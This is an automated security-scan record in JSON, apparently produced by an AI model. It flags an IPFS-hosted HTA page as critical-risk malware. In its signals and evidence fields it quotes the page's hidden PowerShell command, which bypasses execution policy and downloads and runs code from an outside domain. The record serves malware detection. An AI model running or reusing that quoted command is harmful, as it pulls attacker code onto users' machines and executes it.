{"root_cid":"bafkreie3ss3k7zznkn5d5jvgewldtolkfnqw4sxyxukozdh5fkbyputtii","model":"openai/gpt-5.4-mini","analyzed_at":"2026-05-01T02:27:20.502Z","result":{"schema_version":1,"category":"Unknown","category_confidence":0.99,"summary":"A hidden HTA page launches PowerShell to download and execute remote code from an external domain.","signals":["analysis-context.json: content_type is text/html and title is '.' for ipfs://bafkreie3ss3k7zznkn5d5jvgewldtolkfnqw4sxyxukozdh5fkbyputtii/","root: <HTA:APPLICATION ... WINDOWSTATE=\"minimize\" /> indicates a Windows HTA wrapper","root: `shellApp.ShellExecute \"powershell\", \"-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command \"\"try { iwr https://djakondaxxxx.cyou/ -UseBasicParsing | iex } catch { }\"\"`, \"\", \"runas\", 0`"],"quality":{"tier":"broken","score":0.02,"is_substantive":false,"is_redirect_only":false,"is_placeholder":false,"rationale":"The content is not a functional user-facing app; it is a hidden launcher that immediately runs remote code."},"security":{"risk":"critical","risk_score":0.99,"threat_type":"malware_download","safe_to_list":false,"findings":[{"type":"malware_download","severity":"critical","confidence":0.99,"evidence":"`powershell`, `-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden`, and `iwr https://djakondaxxxx.cyou/ -UseBasicParsing | iex` in root","file":"root"}]},"files_reviewed":["analysis-context.json","root"]}}